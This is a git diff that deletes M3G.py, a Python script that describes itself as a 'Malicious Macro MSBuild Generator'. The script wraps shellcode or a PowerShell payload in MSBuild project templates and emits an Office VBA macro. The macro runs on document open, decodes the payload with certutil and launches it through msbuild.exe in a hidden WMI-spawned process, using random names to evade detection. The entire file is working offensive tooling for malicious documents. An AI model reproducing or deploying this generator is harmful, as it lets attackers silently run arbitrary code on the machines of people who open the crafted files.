diff --git a/M3G.py b/M3G.py deleted file mode 100755 index 825a443..0000000 --- a/M3G.py +++ /dev/null @@ -1,196 +0,0 @@ -#!/usr/bin/python -import os -import re -import sys -import base64 -import random -import string -import argparse - -version = "1.0" - -def chunks(l, n): - for i in xrange(0, len(l), n): - yield l[i:i+n] - -def gen_str(): - return ''.join(random.choice(string.letters) for i in range(random.randint(5,15))) - -def minimize(output): - output = re.sub(r'\s*\<\!\-\- .* \-\-\>\s*\n', '', output) - output = output.replace('\n', '') - output = re.sub(r'\s{2,}', ' ', output) - output = re.sub(r'\s+([^\w])\s+', r'\1', output) - output = re.sub(r'([^\w"])\s+', r'\1', output) - - variables = { - 'payload' : 'x', - 'method' : 'm', - 'asm' : 'a', - 'instance' : 'o', - 'pipeline' : 'p', - 'runspace' : 'r', - 'decoded' : 'd' - } - - for k, v in variables.items(): - output = output.replace(k, v) - - return output - -def generate_shellcode(filename): - - shellcode = '' - - if not os.path.exists(filename): - print '[!] File Not Found' - sys.exit(0) - - with open(filename) as f: - shellcode = bytes(bytearray(f.read())) - f.close() - - targetName = gen_str() - - template = open('templates/MSBuild_shellcode.csproj','r').read() - - msbuild = template.replace('[SHELLCODE]',base64.b64encode(shellcode)).replace('[TARGETNAME]',targetName) - - return msbuild - -def generate_powershell(filename): - - powershell = '' - - if not os.path.exists(filename): - print '[!] File Not Found' - sys.exit(0) - - with open(filename, 'rb') as f: - inp = f.read() - powershell += inp - - ps = base64.b64encode(powershell) - - targetName = gen_str() - - template = open('templates/MSBuild_powershell.csproj','r').read() - - msbuild = template.replace('[POWERSHELL]',ps).replace('[TARGETNAME]',targetName) - - return msbuild - -def generate_macro(msbuild_template): - - Method = gen_str() - Str = gen_str() - - msbuild_encoded = base64.b64encode(minimize(msbuild_template)) - chunk = list(chunks(msbuild_encoded,80)) - - macro = 'Dim fs As Object\n' - macro += 'Dim TmpFolder As Object\n' - macro += 'Dim env\n' - macro += 'Dim cu\n' - macro += 'Dim ecu as String\n' - macro += 'Dim emsb as String\n' - macro += 'Dim ex\n' - macro += 'Dim msb\n' - macro += 'Dim officeDir as String\n' - macro += 'Dim msbPath as String\n' - macro += 'Dim TmpFile\n' - macro += 'Dim windir\n' - macro += 'Dim wmsb As Object\n' - macro += 'Dim strLocation As String\n\n' - - macro += 'Sub Auto_Open()\n' - macro += '\t'+Method+'\n' - macro += 'End Sub\n\n' - macro += 'Sub AutoOpen()\n' - macro += '\t'+Method+'\n' - macro += 'End Sub\n\n' - - macro += 'Sub Document_Open()\n' - macro += '\t'+Method+'\n' - macro += 'End Sub\n\n' - - macro += "Public Function "+Method+"() As Variant\n" - macro += '\tSet fs = CreateObject("Scripting.FileSystemObject")\n' - macro += '\tSet TmpFolder = fs.GetSpecialFolder(2)\n\n' - - macro += '\tcu = "certutil"\n' - macro += '\tex = "exe"\n' - macro += '\tmsb = "msbuild"\n' - macro += '\tenv = CStr(Environ("USERPROFILE"))\n' - macro += '\twindir = CStr(Environ("WINDIR"))\n' - macro += '\tofficeDir = env & "\AppData\Local\Microsoft\Office\\"\n' - macro += '\tmsbPath = windir & "\Microsoft.NET\Framework\\v4.0.30319\\"\n' - macro += '\tstrLocation = officeDir & "\\' + gen_str() + '.xml"\n' - macro += '\tTmpFile = "\\' + gen_str() + '.txt"\n\n' - - payload = Str+" = \"" + str(chunk[0]) + "\"\n" - for chk in chunk[1:]: - payload += "\t"+Str+" = "+Str+" + \"" + str(chk) + "\"\n" - - macro += '\t' + payload - macro += '\n\tSet wmsb = fs.CreateTextFile(TmpFolder & TmpFile, True)\n' - macro += '\twmsb.WriteLine ' + Str + '\n' - macro += '\twmsb.Close\n\n' - - macro += '\tConst HIDDEN_WINDOW = 0\n' - macro += '\tstrComputer = "."\n\n' - - macro += '\tecu = cu & strComputer & ex & " " & "-decode -f" & " " & TmpFolder & TmpFile & " " & strLocation\n\n' - - macro += '\tSet ObjWS = GetObject("winmgmts:\\\\" & strComputer & "\\root\cimv2")\n' - macro += '\tSet objS = ObjWS.Get("Win32_ProcessStartup")\n' - macro += '\tSet objC = objS.SpawnInstance_\n' - macro += '\tobjC.ShowWindow = HIDDEN_WINDOW\n' - macro += '\tSet objP = GetObject("winmgmts:\\\\" & strComputer & "\\root\cimv2:Win32_Process")\n' - macro += '\tobjP.Create ecu, Null, objC, intProcessID\n\n' - - macro += '\temsb = msbPath & msb & strComputer & ex & " " & strLocation\n\n' - - macro += '\tSet ObjWS = GetObject("winmgmts:\\\\" & strComputer & "\\root\cimv2")\n' - macro += '\tSet objS = ObjWS.Get("Win32_ProcessStartup")\n' - macro += '\tSet objC = objS.SpawnInstance_\n' - macro += '\tobjC.ShowWindow = HIDDEN_WINDOW\n' - macro += '\tSet objP = GetObject("winmgmts:\\\\" & strComputer & "\\root\cimv2:Win32_Process")\n' - macro += '\tobjP.Create emsb, Null, objC, intProcessID\n' - macro += 'End Function\n' - - return macro - - -def output_file(filename,data): - output = open(filename,"w") - output.write(data) - output.close() - -if __name__ == "__main__": - description = 'M3G - Malicious Macro MSBuild Generator v%s' % version - description += '\nAuthor : Rahmat Nurfauzi (@infosecn1nja)' - parser = argparse.ArgumentParser(description=description,formatter_class=argparse.RawTextHelpFormatter) - parser.add_argument('-i','--inputfile', help='Input file you want to embed into the macro', required=True) - parser.add_argument('-p','--payload', help='Choose a payload for powershell or raw shellcode', required=True) - parser.add_argument('-o','--output', help='Output filename for the macro', required=True) - - args = parser.parse_args() - - inputfile = args.inputfile - payload = args.payload - output = args.output - - msbuild_payload = '' - - if payload == 'shellcode': - msbuild_payload = generate_shellcode(inputfile) - elif payload == 'powershell': - msbuild_payload = generate_powershell(inputfile) - else: - print '[!] Invalid type payload' - sys.exit(0) - - macro = generate_macro(msbuild_payload) - - output_file(output,macro) \ No newline at end of file